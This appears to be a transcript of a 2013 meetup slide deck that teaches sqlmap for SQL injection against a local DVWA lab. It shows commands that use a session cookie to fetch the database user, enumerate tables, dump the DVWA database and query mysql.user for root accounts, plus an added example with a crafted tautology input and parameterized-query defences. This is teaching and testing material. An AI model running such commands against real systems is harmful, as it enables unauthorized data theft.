Slide 1

sqlmap 101
Detect and Exploit SQL Injection
Zaki Akhmad
Python Indonesia Meetup
February 23, 2013

Zaki Akhmad (Python ID Meetup) sqlmap 101 February 23, 2013 1 / 31

Slide 2

About Me

Slide 3

Zaki Akhmad

Slide 4

Security Analyst

Slide 5

Indonesia Chapter Leader

Slide 6

@zakiakhmad

Slide 7

[email protected]
0xFD57BE80 available at pgp.mit.edu

Slide 8

enthusiast

Slide 9

SQL Injection

Slide 10

Exploits of a Mom, XKCD #327

Slide 11

"SQL Injection is (mostly) about the unauthorized DBMS data access"
Miroslav Stampar, sqlmap Developer

Slide 12

SQL Injection techniques:
    Blind
    Error
    Union (partial and full)
    Time
    Stacked
    ... sqlmap 102
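Added example (not from the slides or the sqlmap project): each technique in this list works only when request input is concatenated into the SQL text. The code contrasts a concatenated lookup with a parameterized one on a constructed in-memory SQLite table modeled on a DVWA-style `id` parameter; the table, rows and function names are assumptions.

```python
import sqlite3


def make_db():
    # Constructed sample rows standing in for an application's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [(1, "admin"), (2, "gordon"), (3, "pablo")],
    )
    return db


def lookup_concatenated(db, user_id):
    # Weak form: the request value becomes part of the SQL text itself,
    # so a quote character in it can change the structure of the query.
    sql = "SELECT first_name FROM users WHERE user_id = '%s'" % user_id
    return sorted(row[0] for row in db.execute(sql))


def lookup_parameterized(db, user_id):
    # Hardened form: the value is bound to a placeholder and is only ever data.
    sql = "SELECT first_name FROM users WHERE user_id = ?"
    return sorted(row[0] for row in db.execute(sql, (user_id,)))


def lookup_validated(db, user_id):
    # Defense in depth: an id is numeric, so reject anything else up front.
    if not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("id must be a positive integer")
    return lookup_parameterized(db, int(user_id))


if __name__ == "__main__":
    db = make_db()
    benign = "2"
    crafted = "2' OR '1'='1"  # constructed input: a quote plus a tautology
    for name, fn in [("concatenated", lookup_concatenated),
                     ("parameterized", lookup_parameterized)]:
        print(name, fn(db, benign), fn(db, crafted))
    try:
        lookup_validated(db, crafted)
    except ValueError as exc:
        print("validated: rejected,", exc)
```

With the concatenated form the crafted value returns every row; with the bound placeholder it matches nothing, which is why a scanner stops reporting the parameter as injectable once the query is parameterized.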

Slide 13

What’s sqlmap
open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database server(s)

Slide 14

sqlmap Project Details
    repository:    https://github.com/sqlmapproject/sqlmap
    web:           http://sqlmap.org
    twitter:       @sqlmap
    contact:       dev at sqlmap.org
    mailing list:  sqlmap-users at lists.sourceforge.net

Slide 15

Project Statistics
http://www.ohloh.net/p/sqlmap

Slide 16

Get and Update sqlmap
$ git clone https://github.com/sqlmapproject/sqlmap.git
$ python sqlmap.py --update

Slide 17

DVWA as an Example

Slide 18

Find the entry point
$ python sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"
[13:27:54] [INFO] testing connection to the target url
[13:27:54] [INFO] heuristics detected web page charset 'None'
sqlmap got a 302 redirect to 'http://localhost:80/dvwa/login.php'. Do you want to follow? [Y/n]

Slide 19

So, we need a cookie
$ ./sqlmap.py --cookie "PHPSESSID=1gn63kn3opj97l6325h0f9sjn2; security=low" \
    -u "http://localhost/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit"

Slide 20

sqlmap found SQL injection points

Slide 21

sqlmap fingerprinting result

Slide 22

Retrieve DBMS current user
$ python sqlmap.py -u ... --cookie ... --current-user
[15:17:35] [INFO] fetching current user
current user: 'root@localhost'

Slide 23

Enumerate DBMS database tables
$ python sqlmap.py -u ... --cookie ... --tables
[14:45:32] [INFO] fetching tables for databases: 'dvwa, mysql'

Slide 24

Enumerate DBMS database table

Slide 25

Dump DBMS database table entries
$ python sqlmap.py -u ... --cookie ... --dump DVWA

Slide 26

Dump DBMS database table entries

Slide 27

Contribution
    Feature request
        Configure output directory
        Retrieve database server IP address
    Bug
        [CRITICAL] unhandled exception

Slide 28

Configure output directory
$ python sqlmap.py -u ... --cookie ... --output-dir /tmp/sqlmap

Slide 29

Retrieve database server IP address
$ python sqlmap.py -u ... --cookie ... --sql-query="SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%'"
SELECT host, user FROM mysql.user WHERE user LIKE '%root%' OR user LIKE '%admin%' [4]:
[*] 127.0.0.1, root
[*] localhost, phpmyadmin
[*] localhost, root
[*] zara, root

Slide 30

Reference
sqlmap - security development in python, Miroslav Stampar, EuroPython 2011

Slide 31

.finish